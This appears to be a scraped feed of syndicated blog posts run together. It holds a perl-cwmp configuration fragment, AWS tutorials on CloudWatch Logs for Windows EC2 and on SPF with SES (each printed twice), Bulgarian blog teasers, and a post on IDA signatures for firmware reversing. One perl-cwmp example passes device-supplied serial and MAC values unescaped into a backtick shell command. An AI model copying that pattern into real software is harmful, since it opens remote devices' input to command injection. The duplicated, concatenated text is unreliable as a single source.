${InternetGatewayDevice.DeviceInfo.SerialNumber}And last but not least – now you can execute small code, or external script and set the value of a property to the output of that code. You can do that with $[ code ]Here is an example how to set a random value to the PeriodicInformInterval:InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#$[60 + int(rand(100))]Here is another example, how to execute external script that could take this decision:InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#$[ `./externalscript.sh ${InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1.MACAddress} ${InternetGatewayDevice.DeviceInfo.SerialNumber}` ]The last modification I’ve done is to allow the perl-cwmp to “fork” a new process when a TR-069 request arrives. It has been single threaded code, which mean the agents has to wait until the previous task is completed. However, if the TCP listening queue is full, or the ACS very busy, some of the agents will assume there is no response and timeout. You may have to wait for 24h (the default periodic interval for some vendors) until you get your next request. Now that can be avoided.All this is very valuable for dynamic and automated configurations without the need of modification of the core code, just modifying the configuration file.

Using CloudWatch Logs with Amazon EC2 Running Microsoft Windows Server

Post Syndicated from Mats Lanner original http://blogs.aws.amazon.com/application-management/post/Tx1KG4IKXZ94QFK/Using-CloudWatch-Logs-with-Amazon-EC2-Running-Microsoft-Windows-Server

Now Amazon EC2 running Microsoft Windows Server provides enhanced log support for Amazon CloudWatch Logs. You can monitor the operations and performance of your EC2 for Windows instances and applications in near real-time using standard log and performance data sources including:

Event Tracing for Windows log sources

IIS request logs

Performance Counters

Text-based log files

Windows Event Logs

EC2 Windows integrates with CloudWatch Logs using a plug-in for the EC2Config service that is installed on all new EC2 Windows instances by default. To follow along with the example in this post, you will need to download the latest version of the EC2Config service software from http://aws.amazon.com/developertools/5562082477397515.

For this blog post, I’m using a SQL Server 2014 instance just so that uploading of SQL Server logs can be demonstrated.

Permissions

While the CloudWatch plug-in for EC2Config supports explicit credentials, it’s strongly recommended to use IAM Roles for EC2 which makes it possible to associate specific permissions with an EC2 instance when it’s launched.

A sample policy allows the necessary CloudWatch and CloudWatch logs actions (to learn more about adding a policy to an existing IAM role, see IAM Users and Groups and Managing IAM Policies in Using IAM) is this:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1414002531000",
"Effect": "Allow",
"Action": [
"cloudwatch:PutMetricData"
],
"Resource": [
"*"
]
},
{
"Sid": "Stmt1414002720000",
"Effect": "Allow",
"Action": [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:DescribeLogGroups",
"logs:DescribeLogStreams",
"logs:PutLogEvents"
],
"Resource": [
"*"
]
}
]
}

CloudWatch Plug-In Configuration

Detailed information on how to configure CloudWatch can be found here: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#send_logs_to_cwl. In this blog post I will focus on a few specific examples around Event Tracing for Windows (ETW) and SQL Server error logs.

Enable the Plug-In

The CloudWatch plug-in for EC2Config is disabled by default, so the first step that needs to be taken is to enable it. The easiest way to do this is to run EC2ConfigService Settings on the instance where you want to enable the plug-in:

Enabling CloudWatch support

Check the Enable CloudWatch Logs integration checkbox and click the OK button to save the changes. Note that the EC2Config service must be restarted for this to take effect, but we can hold off on doing that in this case as we will first configure the log sources that should be uploaded to CloudWatch Logs and the Performance Counters that should be uploaded to CloudWatch. For information on how to programatically enable the integration, see the documentation: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#enable_cwl_integration

Configuration

The CloudWatch plug-in is configured using the file %PROGRAMFILES%AmazonEc2ConfigServiceSettingsAWS.EC2.Windows.CloudWatch.json. This file contains the settings for CloudWatch, CloudWatch Logs, the log sources and performance counters that should be uploaded. For the purposes of this post I’m going to use the default settings for CloudWatch which means that data will be uploaded to us-east-1 using the CloudWatch namespace Windows/Default. I will, however, customize the configuration for CloudWatch Logs to demonstrate how different log sources can be uploaded to different log groups and log streams.

CloudWatch Logs

For this example I will use two log groups and log streams for the different types of log data that will be configured later, so replace the default CloudWatch Logs configuration:

{
  "Id": "CloudWatchLogs",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "Default-Log-Group",
    "LogStream": "{instance_id}"
  }
},

With:

{
  "Id": "CloudWatchLogsSystem",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "System-Logs",
    "LogStream": "{instance_id}"
  }
},
{
  "Id": "CloudWatchLogsSQL",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "SQL-Logs",
    "LogStream": "{instance_id}"
  }
},

This configuration creates two CloudWatch Logs components, one that will upload log data to the log group System-Logs (which will be used for Event Logs and ETW) and one that will upload log data to the log group SQL-Logs (which will be used to upload SQL Server log files).

Log Sources

The default configuration file contains sample configurations for all supported log sources. For this post I will define a new ETW log source to capture group policy processing and a custom log file source to capture SQL Server error log files.

Event Tracing for Windows

The default configuration file contains a sample ETW log source with the id ETW, modify this log source to look like this:

{
  "Id": "ETW",
  "FullName": "AWS.EC2.Windows.CloudWatch.EventLog.EventLogInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "LogName": "Microsoft-Windows-GroupPolicy/Operational",
    "Levels": "7"
  }
},

This change tells the plug-in to upload all log entries from the ETW source that shows up as Applications and Services Logs | Microsoft | Windows | GroupPolicy | Operational in the Windows Event Viewer.

Custom Log Files

The custom log file support can handle almost any text-based log file. To configure upload of SQL Server error logs, change the sample CustomLogs log source to look like this:

{
  "Id": "CustomLogs",
  "FullName": "AWS.EC2.Windows.CloudWatch.CustomLog.CustomLogInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "LogDirectoryPath": "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Log",
    "TimestampFormat": "yyyy-MM-dd HH:mm:ss.ff",
    "Encoding": "UTF-16",
    "Filter": "ERRORLOG*",
    "CultureName": "en-US",
    "TimeZoneKind": "Local"
  }
},

This configuration tells the plug-in to look for log files that start with the file name ERRORLOG (e.g. ERRORLOG, ERRORLOG.1, etc.) in the directory C:Program FilesMicrosoft SQL ServerMSSQL12.MSSQLSERVERMSSQLLog. Finally, the timestamp format setting has been updated to match the timestamp used by SQL Server and the encoding for the file set to reflect that SQL Server uses UTF-16 encoding for the log file.

Performance Counters

In addition to log data, you can also send Windows Performance Counters to CloudWatch as custom metrics. This makes it possible to monitor specific performance indicators from inside an instance and allows you to create alarms based on this data.

The default configuration file contains a sample performance counter that uploads the available memory performance counter:

{
  "Id": "PerformanceCounter",
  "FullName": "AWS.EC2.Windows.CloudWatch.PerformanceCounterComponent.PerformanceCounterInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "CategoryName": "Memory",
    "CounterName": "Available MBytes",
    "InstanceName": "",
    "MetricName": "Memory",
    "Unit": "Megabytes",
    "DimensionName": "",
    "DimensionValue": ""
  }
},

Add an additional performance counter to this – the amount of free space available on the C drive on the instance. Update the configuration file to also include the Logical Disk | Free Megabytes performance counter:

{
  "Id": "PerformanceCounterDisk",
  "FullName": "AWS.EC2.Windows.CloudWatch.PerformanceCounterComponent.PerformanceCounterInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "CategoryName": "LogicalDisk",
    "CounterName": "Free Megabytes",
    "InstanceName": "C:",
    "MetricName": "FreeDisk",
    "Unit": "Megabytes",
    "DimensionName": "",
    "DimensionValue": ""
  }
},

Putting it All Together

The final step in configuring the plug-in is to define what data should be sent where. Towards the end of the default configuration file you will find a section looking like this:

"Flows": {
  "Flows":
  [
    "(ApplicationEventLog,SystemEventLog),CloudWatchLogs"
  ]
}

Detailed information on how this setting works is available here: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#configure_log_flow. To use the configuration defined above, change this section to this:

"Flows": {
  "Flows":
  [
    "(SystemEventLog,ETW),CloudWatchLogsSystem",
    "CustomLogs,CloudWatchLogsSQL",
    "(PerformanceCounter,PerformanceCounterDisk),CloudWatch"
  ]
}

The flow definition uses the component identifiers to specify how data should flow from the source to the destination. In the example above the flow is defined as:

Send log data from the System event log and the ETW log source log group System-Logs

Send SQL Server error log file to the log group SQL-Logs

Send the two performance counters to the Windows/Default metric namespace

Now that the configuration is complete, save the configuration file and use the Service Manager to restart the Ec2Config service, or from the command line run the commands:

C:> net stop ec2config

C:> net start ec2config

Once the Ec2Config service has restarted, it will start sending both the configured log data and performance counters to CloudWatch Logs and CloudWatch. Note that it will take a few minutes before the first data appears in the console.

Access Log Data in CloudWatch Logs

Shortly after starting the Ec2Config service, you will be able to see the new log groups created in the console at https://console.aws.amazon.com/cloudwatch/home?region=us-east-1#logs:. In our example, we can see both the System-Logs and SQL-Logs log groups and the log data from our example instance in the instance-specific log stream:

Uploaded SQL Server log data.

With the log data in place, you can now create metric filters to start monitoring the events that are relevant to you. More information on how to configure metric filters can be found here: http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/MonitoringPolicyExamples.html

Access Performance Metrics in CloudWatch

With the configuration defined above, you can access the uploaded performance counters in the console at https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-1#metrics:metricFilter=Pattern%253DWindows%252FDefault:

Performance counter data uploaded to CloudWatch.

At this point you can configure alarms on the metrics (for instance configure an alarm if the FreeDisk metrics goes below 20GB).

 

Using CloudWatch Logs with Amazon EC2 Running Microsoft Windows Server

Post Syndicated from Mats Lanner original http://blogs.aws.amazon.com/application-management/post/Tx1KG4IKXZ94QFK/Using-CloudWatch-Logs-with-Amazon-EC2-Running-Microsoft-Windows-Server

Now Amazon EC2 running Microsoft Windows Server provides enhanced log support for Amazon CloudWatch Logs. You can monitor the operations and performance of your EC2 for Windows instances and applications in near real-time using standard log and performance data sources including:

Event Tracing for Windows log sources

IIS request logs

Performance Counters

Text-based log files

Windows Event Logs

EC2 Windows integrates with CloudWatch Logs using a plug-in for the EC2Config service that is installed on all new EC2 Windows instances by default. To follow along with the example in this post, you will need to download the latest version of the EC2Config service software from http://aws.amazon.com/developertools/5562082477397515.

For this blog post, I’m using a SQL Server 2014 instance just so that uploading of SQL Server logs can be demonstrated.

Permissions

While the CloudWatch plug-in for EC2Config supports explicit credentials, it’s strongly recommended to use IAM Roles for EC2 which makes it possible to associate specific permissions with an EC2 instance when it’s launched.

A sample policy allows the necessary CloudWatch and CloudWatch logs actions (to learn more about adding a policy to an existing IAM role, see IAM Users and Groups and Managing IAM Policies in Using IAM) is this:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1414002531000",
"Effect": "Allow",
"Action": [
"cloudwatch:PutMetricData"
],
"Resource": [
"*"
]
},
{
"Sid": "Stmt1414002720000",
"Effect": "Allow",
"Action": [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:DescribeLogGroups",
"logs:DescribeLogStreams",
"logs:PutLogEvents"
],
"Resource": [
"*"
]
}
]
}

CloudWatch Plug-In Configuration

Detailed information on how to configure CloudWatch can be found here: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#send_logs_to_cwl. In this blog post I will focus on a few specific examples around Event Tracing for Windows (ETW) and SQL Server error logs.

Enable the Plug-In

The CloudWatch plug-in for EC2Config is disabled by default, so the first step that needs to be taken is to enable it. The easiest way to do this is to run EC2ConfigService Settings on the instance where you want to enable the plug-in:

Enabling CloudWatch support

Check the Enable CloudWatch Logs integration checkbox and click the OK button to save the changes. Note that the EC2Config service must be restarted for this to take effect, but we can hold off on doing that in this case as we will first configure the log sources that should be uploaded to CloudWatch Logs and the Performance Counters that should be uploaded to CloudWatch. For information on how to programatically enable the integration, see the documentation: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#enable_cwl_integration

Configuration

The CloudWatch plug-in is configured using the file %PROGRAMFILES%AmazonEc2ConfigServiceSettingsAWS.EC2.Windows.CloudWatch.json. This file contains the settings for CloudWatch, CloudWatch Logs, the log sources and performance counters that should be uploaded. For the purposes of this post I’m going to use the default settings for CloudWatch which means that data will be uploaded to us-east-1 using the CloudWatch namespace Windows/Default. I will, however, customize the configuration for CloudWatch Logs to demonstrate how different log sources can be uploaded to different log groups and log streams.

CloudWatch Logs

For this example I will use two log groups and log streams for the different types of log data that will be configured later, so replace the default CloudWatch Logs configuration:

{
  "Id": "CloudWatchLogs",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "Default-Log-Group",
    "LogStream": "{instance_id}"
  }
},

With:

{
  "Id": "CloudWatchLogsSystem",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "System-Logs",
    "LogStream": "{instance_id}"
  }
},
{
  "Id": "CloudWatchLogsSQL",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "SQL-Logs",
    "LogStream": "{instance_id}"
  }
},

This configuration creates two CloudWatch Logs components, one that will upload log data to the log group System-Logs (which will be used for Event Logs and ETW) and one that will upload log data to the log group SQL-Logs (which will be used to upload SQL Server log files).

Log Sources

The default configuration file contains sample configurations for all supported log sources. For this post I will define a new ETW log source to capture group policy processing and a custom log file source to capture SQL Server error log files.

Event Tracing for Windows

The default configuration file contains a sample ETW log source with the id ETW, modify this log source to look like this:

{
  "Id": "ETW",
  "FullName": "AWS.EC2.Windows.CloudWatch.EventLog.EventLogInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "LogName": "Microsoft-Windows-GroupPolicy/Operational",
    "Levels": "7"
  }
},

This change tells the plug-in to upload all log entries from the ETW source that shows up as Applications and Services Logs | Microsoft | Windows | GroupPolicy | Operational in the Windows Event Viewer.

Custom Log Files

The custom log file support can handle almost any text-based log file. To configure upload of SQL Server error logs, change the sample CustomLogs log source to look like this:

{
  "Id": "CustomLogs",
  "FullName": "AWS.EC2.Windows.CloudWatch.CustomLog.CustomLogInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "LogDirectoryPath": "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Log",
    "TimestampFormat": "yyyy-MM-dd HH:mm:ss.ff",
    "Encoding": "UTF-16",
    "Filter": "ERRORLOG*",
    "CultureName": "en-US",
    "TimeZoneKind": "Local"
  }
},

This configuration tells the plug-in to look for log files that start with the file name ERRORLOG (e.g. ERRORLOG, ERRORLOG.1, etc.) in the directory C:Program FilesMicrosoft SQL ServerMSSQL12.MSSQLSERVERMSSQLLog. Finally, the timestamp format setting has been updated to match the timestamp used by SQL Server and the encoding for the file set to reflect that SQL Server uses UTF-16 encoding for the log file.

Performance Counters

In addition to log data, you can also send Windows Performance Counters to CloudWatch as custom metrics. This makes it possible to monitor specific performance indicators from inside an instance and allows you to create alarms based on this data.

The default configuration file contains a sample performance counter that uploads the available memory performance counter:

{
  "Id": "PerformanceCounter",
  "FullName": "AWS.EC2.Windows.CloudWatch.PerformanceCounterComponent.PerformanceCounterInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "CategoryName": "Memory",
    "CounterName": "Available MBytes",
    "InstanceName": "",
    "MetricName": "Memory",
    "Unit": "Megabytes",
    "DimensionName": "",
    "DimensionValue": ""
  }
},

Add an additional performance counter to this – the amount of free space available on the C drive on the instance. Update the configuration file to also include the Logical Disk | Free Megabytes performance counter:

{
  "Id": "PerformanceCounterDisk",
  "FullName": "AWS.EC2.Windows.CloudWatch.PerformanceCounterComponent.PerformanceCounterInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "CategoryName": "LogicalDisk",
    "CounterName": "Free Megabytes",
    "InstanceName": "C:",
    "MetricName": "FreeDisk",
    "Unit": "Megabytes",
    "DimensionName": "",
    "DimensionValue": ""
  }
},

Putting it All Together

The final step in configuring the plug-in is to define what data should be sent where. Towards the end of the default configuration file you will find a section looking like this:

"Flows": {
  "Flows":
  [
    "(ApplicationEventLog,SystemEventLog),CloudWatchLogs"
  ]
}

Detailed information on how this setting works is available here: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#configure_log_flow. To use the configuration defined above, change this section to this:

"Flows": {
  "Flows":
  [
    "(SystemEventLog,ETW),CloudWatchLogsSystem",
    "CustomLogs,CloudWatchLogsSQL",
    "(PerformanceCounter,PerformanceCounterDisk),CloudWatch"
  ]
}

The flow definition uses the component identifiers to specify how data should flow from the source to the destination. In the example above the flow is defined as:

Send log data from the System event log and the ETW log source log group System-Logs

Send SQL Server error log file to the log group SQL-Logs

Send the two performance counters to the Windows/Default metric namespace

Now that the configuration is complete, save the configuration file and use the Service Manager to restart the Ec2Config service, or from the command line run the commands:

C:> net stop ec2config

C:> net start ec2config

Once the Ec2Config service has restarted, it will start sending both the configured log data and performance counters to CloudWatch Logs and CloudWatch. Note that it will take a few minutes before the first data appears in the console.

Access Log Data in CloudWatch Logs

Shortly after starting the Ec2Config service, you will be able to see the new log groups created in the console at https://console.aws.amazon.com/cloudwatch/home?region=us-east-1#logs:. In our example, we can see both the System-Logs and SQL-Logs log groups and the log data from our example instance in the instance-specific log stream:

Uploaded SQL Server log data.

With the log data in place, you can now create metric filters to start monitoring the events that are relevant to you. More information on how to configure metric filters can be found here: http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/MonitoringPolicyExamples.html

Access Performance Metrics in CloudWatch

With the configuration defined above, you can access the uploaded performance counters in the console at https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-1#metrics:metricFilter=Pattern%253DWindows%252FDefault:

Performance counter data uploaded to CloudWatch.

At this point you can configure alarms on the metrics (for instance configure an alarm if the FreeDisk metrics goes below 20GB).

 

Инициатива за свободни книги

Post Syndicated from Йовко Ламбрев original https://blog.yovko.net/free-books/

За много от нас е ясно, че обществото ни пропусна да съпреживее важна част от процесите, които ни доведоха до света, в който живеем днес. Може би именно затова голяма част от българите се чувстват като объркани пътници в шарената влакова композиция на Европа и без ясна идея защо и накъде пътуват. И това е обяснимо, защото зад Завесата пропуснахме да споделим усилията и стремленията на хората към обединена Европа, пропуснахме осмислянето на мотивите им, всичко се случи някак встрани от нас.

Опитайте Inoreader

Post Syndicated from Йовко Ламбрев original https://blog.yovko.net/opitajte-inoreader/

Помните ли Google Reader? Това не беше само един от добрите проекти на Google, по който вярвам, че още много хора тъгуват. Той беше крайъгълен камък за един роматичен период на развитието на блогосферата (и българската), който свързваше общности от хора на базата на това какво пишат и какво четат. И преди социалните мрежи да опошлят това.
Спирането на Google Reader доведе до появата на много алтернативи, някои от които доста сполучливи и иновативни.

SPF and Amazon SES

Post Syndicated from Adrian Hamciuc original http://sesblog.amazon.com/post/Tx3IREZBQXXL8O8/SPF-and-Amazon-SES

Update (3/14/16): To increase your SPF authentication options, Amazon SES now enables you to use your own MAIL FROM domain. For more information, see Authenticating Email with SPF in Amazon SES.

One of the most important aspects of email communication today is making sure the right person sent you the right message. There are several standards in place to address various aspects of securing email sending; one of the most commonly known is SPF (the short form of Sender Policy Framework). In this blog post we explain what SPF is, how it works, and how Amazon SES handles it. We also address the most common questions we see from customers with regard to their concerns around email security.

What is SPF?

Described in RFC 7208 (http://tools.ietf.org/html/rfc7208 ), SPF is an open standard designed to prevent sender address forgery. In particular, it is used to confirm that the IP address from which an email originates is allowed to send emails by the owner of the domain that sent the email. What does that mean and how does it happen?

Before going into how SPF works, we should clarify exactly what it does and does not do. First, let’s separate the actual email message body and its headers from the SMTP protocol used to send it. SPF works by authenticating the IP address that originated the SMTP connection to the domain used in the SMTP MAIL-FROM and/or the HELO/EHLO command. The From header, which is part of the email message itself, is not covered by SPF validation. A separate standard, DomainKeys Identified Mail (DKIM), is used to authenticate the message body and headers against the From header domain (which can be different from the domain used in the SMTP MAIL-FROM command).

Now that we’ve talked about what SPF does, let’s look at how it actually works. SPF involves publishing a DNS record in the domain that wants to allow IP addresses to send from it. This DNS record needs to contain either blocks of IP addresses that are permitted to send from it, or another domain to which authorization is delegated (or both). When an ISP receives an email and wants to validate that the IP address that sent the mail is allowed to send it on behalf of the sending domain, the ISP performs a DNS query against the SPF record. If such a record exists and contains the IP address in question or delegates to a domain that contains it, then we know that the IP address is authorized to send emails from that domain.

SPF and Amazon SES

If you are using Amazon SES to send from your domain, you need to know that the current SES implementation involves sending emails from an SES-owned MAIL-FROM domain. This means that you do not need to make any changes to your DNS records in order for your emails to pass SPF authentication.

Common concerns

There are a couple of questions we frequently hear from customers with regard to SPF authorization and how it relates to Amazon SES usage.

The first concern seems to be how your sending is affected if SPF authentication is performed against Amazon SES and not against your own domain.

If you’re wondering whether any other SES customer can send on your behalf, the answer is no. SES does not allow sending from a specific domain or email address until that domain or email address has been successfully verified with SES, a process that cannot take place without the consent of the domain/address’s owner.

The next question is whether you can still have a mechanism under your control that can authenticate the email-related content that you do control (things such as the message body, or various headers such as the From header, subject, or destinations). The answer is yes — Amazon SES offers DKIM signing capabilities (or the possibility to roll out your own). DKIM is another open standard that can authenticate the integrity of an email message, including its content and headers, and can prove to ISPs that your domain (not Amazon’s or someone else’s) takes responsibility and claims ownership of that specific email.

Another concern you may have is how much flexibility you get in using SPF to elicit a specific ISP response for unauthenticated or unauthorized emails from your domain. In particular, this concern translates into configuring DMARC (short for Domain-based Message Authentication, Reporting & Conformance) to work with SES. DMARC is a standard way of telling ISPs how to handle unauthenticated emails, and it’s based on both a) Successful SPF and/or DKIM authentication and b) Domain alignment (all authenticated domains must match). As explained above, your MAIL-FROM domain is currently an SES domain, which doesn’t match your sending domain (From header). As a result, SPF authentication will be misaligned for DMARC purposes. DKIM, on the other hand, provides the necessary domain alignment and ultimately satisfies DMARC because you are authenticating your From domain.

Simply put, you must enable DKIM signing for your verified domain in order to be able to successfully configure DMARC for your domain.

 If you have any questions, comments or other concerns related to SPF and your Amazon SES sending, don’t hesitate to jump on the Amazon SES Forum and let us know. Thank you for choosing SES and happy sending!

SPF and Amazon SES

Post Syndicated from Adrian Hamciuc original http://sesblog.amazon.com/post/Tx3IREZBQXXL8O8/SPF-and-Amazon-SES

Update (3/14/16): To increase your SPF authentication options, Amazon SES now enables you to use your own MAIL FROM domain. For more information, see Authenticating Email with SPF in Amazon SES.

One of the most important aspects of email communication today is making sure the right person sent you the right message. There are several standards in place to address various aspects of securing email sending; one of the most commonly known is SPF (the short form of Sender Policy Framework). In this blog post we explain what SPF is, how it works, and how Amazon SES handles it. We also address the most common questions we see from customers with regard to their concerns around email security.

What is SPF?

Described in RFC 7208 (http://tools.ietf.org/html/rfc7208 ), SPF is an open standard designed to prevent sender address forgery. In particular, it is used to confirm that the IP address from which an email originates is allowed to send emails by the owner of the domain that sent the email. What does that mean and how does it happen?

Before going into how SPF works, we should clarify exactly what it does and does not do. First, let’s separate the actual email message body and its headers from the SMTP protocol used to send it. SPF works by authenticating the IP address that originated the SMTP connection to the domain used in the SMTP MAIL-FROM and/or the HELO/EHLO command. The From header, which is part of the email message itself, is not covered by SPF validation. A separate standard, DomainKeys Identified Mail (DKIM), is used to authenticate the message body and headers against the From header domain (which can be different from the domain used in the SMTP MAIL-FROM command).

Now that we’ve talked about what SPF does, let’s look at how it actually works. SPF involves publishing a DNS record in the domain that wants to allow IP addresses to send from it. This DNS record needs to contain either blocks of IP addresses that are permitted to send from it, or another domain to which authorization is delegated (or both). When an ISP receives an email and wants to validate that the IP address that sent the mail is allowed to send it on behalf of the sending domain, the ISP performs a DNS query against the SPF record. If such a record exists and contains the IP address in question or delegates to a domain that contains it, then we know that the IP address is authorized to send emails from that domain.

SPF and Amazon SES

If you are using Amazon SES to send from your domain, you need to know that the current SES implementation involves sending emails from an SES-owned MAIL-FROM domain. This means that you do not need to make any changes to your DNS records in order for your emails to pass SPF authentication.

Common concerns

There are a couple of questions we frequently hear from customers with regard to SPF authorization and how it relates to Amazon SES usage.

The first concern seems to be how your sending is affected if SPF authentication is performed against Amazon SES and not against your own domain.

If you’re wondering whether any other SES customer can send on your behalf, the answer is no. SES does not allow sending from a specific domain or email address until that domain or email address has been successfully verified with SES, a process that cannot take place without the consent of the domain/address’s owner.

The next question is whether you can still have a mechanism under your control that can authenticate the email-related content that you do control (things such as the message body, or various headers such as the From header, subject, or destinations). The answer is yes — Amazon SES offers DKIM signing capabilities (or the possibility to roll out your own). DKIM is another open standard that can authenticate the integrity of an email message, including its content and headers, and can prove to ISPs that your domain (not Amazon’s or someone else’s) takes responsibility and claims ownership of that specific email.

Another concern you may have is how much flexibility you get in using SPF to elicit a specific ISP response for unauthenticated or unauthorized emails from your domain. In particular, this concern translates into configuring DMARC (short for Domain-based Message Authentication, Reporting & Conformance) to work with SES. DMARC is a standard way of telling ISPs how to handle unauthenticated emails, and it’s based on both a) Successful SPF and/or DKIM authentication and b) Domain alignment (all authenticated domains must match). As explained above, your MAIL-FROM domain is currently an SES domain, which doesn’t match your sending domain (From header). As a result, SPF authentication will be misaligned for DMARC purposes. DKIM, on the other hand, provides the necessary domain alignment and ultimately satisfies DMARC because you are authenticating your From domain.

Simply put, you must enable DKIM signing for your verified domain in order to be able to successfully configure DMARC for your domain.

 If you have any questions, comments or other concerns related to SPF and your Amazon SES sending, don’t hesitate to jump on the Amazon SES Forum and let us know. Thank you for choosing SES and happy sending!

A Code Signature Plugin for IDA

Post Syndicated from Craig original http://www.devttys0.com/2014/10/a-code-signature-plugin-for-ida/

When reversing embedded code, it is often the case that completely different devices are built around a common code base, either due to code re-use by the vendor, or through the use of third-party software; this is especially true of devices running the same Real Time Operating System.
For example, I have two different routers, manufactured by two different vendors, and released about four years apart. Both devices run VxWorks, but the firmware for the older device included a symbol table, making it trivial to identify most of the original function names:
VxWorks Symbol TableVxWorks Symbol Table
The older device with the symbol table is running VxWorks 5.5, while the newer device (with no symbol table) runs VxWorks 5.5.1, so they are pretty close in terms of their OS version. However, even simple functions contain a very different sequence of instructions when compared between the two firmwares:
strcpy from the VxWorks 5.5 firmwarestrcpy from the VxWorks 5.5 firmware
strcpy from the VxWorks 5.5.1 firmwarestrcpy from the VxWorks 5.5.1 firmware
Of course, binary variations can be the result of any number of things, including differences in the compiler version and changes to the build options.
Despite this, it would still be quite useful to take the known symbol names from the older device, particularly those of standard and common subroutines, and apply them to the newer device in order to facilitate the reversing of higher level functionality.

Existing Solutions
The IDB_2_PAT plugin will generate FLIRT signatures from the IDB with a symbol table; IDA’s FLIRT analysis can then be used to identify functions in the newer, symbol-less IDB:
Functions identified by IDA FLIRT analysisFunctions identified by IDA FLIRT analysis
With the FLIRT signatures, IDA was able to identify 164 functions, some of which, like os_memcpy and udp_cksum, are quite useful.
Of course, FLIRT signatures will only identify functions that start with the same sequence of instructions, and many of the standard POSIX functions, such as printf and strcmp, were not found.
Because FLIRT signatures only examine the first 32 bytes of a function, there are also many signature collisions between similar functions, which can be problematic:

;——— (delete these lines to allow sigmake to read this file)
; add ‘+’ at the start of a line to select a module
; add ‘-‘ if you are not sure about the selection
; do nothing if you want to exclude all modules

div_r 54 B8C8 00000000000000000085001A0000081214A00002002010210007000D2401FFFF
ldiv_r 54 B8C8 00000000000000000085001A0000081214A00002002010210007000D2401FFFF

proc_sname 00 0000 0000102127BDFEF803E0000827BD0108…………………………..
proc_file 00 0000 0000102127BDFEF803E0000827BD0108…………………………..

atoi 00 0000 000028250809F52A2406000A………………………………….
atol 00 0000 000028250809F52A2406000A………………………………….

PinChecksum FF 5EB5 00044080010440213C046B5F000840403484CA6B010400193C0ECCCC35CECCCD
wps_checksum1 FF 5EB5 00044080010440213C046B5F000840403484CA6B010400193C0ECCCC35CECCCD
wps_checksum2 FF 5EB5 00044080010440213C046B5F000840403484CA6B010400193C0ECCCC35CECCCD

_d_cmp FC 1FAF 0004CD02333907FF240F07FF172F000A0006CD023C18000F3718FFFF2419FFFF
_d_cmpe FC 1FAF 0004CD02333907FF240F07FF172F000A0006CD023C18000F3718FFFF2419FFFF

_f_cmp A0 C947 0004CDC2333900FF241800FF173800070005CDC23C19007F3739FFFF0099C824
_f_cmpe A0 C947 0004CDC2333900FF241800FF173800070005CDC23C19007F3739FFFF0099C824

m_get 00 0000 00803021000610423C04803D8C8494F0…………………………..
m_gethdr 00 0000 00803021000610423C04803D8C8494F0…………………………..
m_getclr 00 0000 00803021000610423C04803D8C8494F0…………………………..

Alternative Signature Approaches
Examining the functions between the two VxWorks firmwares shows that there are a small fraction (about 3%) of unique subroutines that are identical between both firmware images:
bcopy from the VxWorks 5.5 firmwarebcopy from the VxWorks 5.5 firmware
bcopy from the VxWorks 5.5.1 firmwarebcopy from the VxWorks 5.5.1 firmware
Signatures can be created over the entirety of these functions in order to generate more accurate fingerprints, without the possibility of collisions due to similar or identical function prologues in unrelated subroutines.
Still other functions are very nearly identical, as exemplified by the following functions which only differ by a couple of instructions:
A function from the VxWorks 5.5 firmwareA function from the VxWorks 5.5 firmware
The same function, in the VxWorks 5.5.1 firmwareThe same function, from the VxWorks 5.5.1 firmware
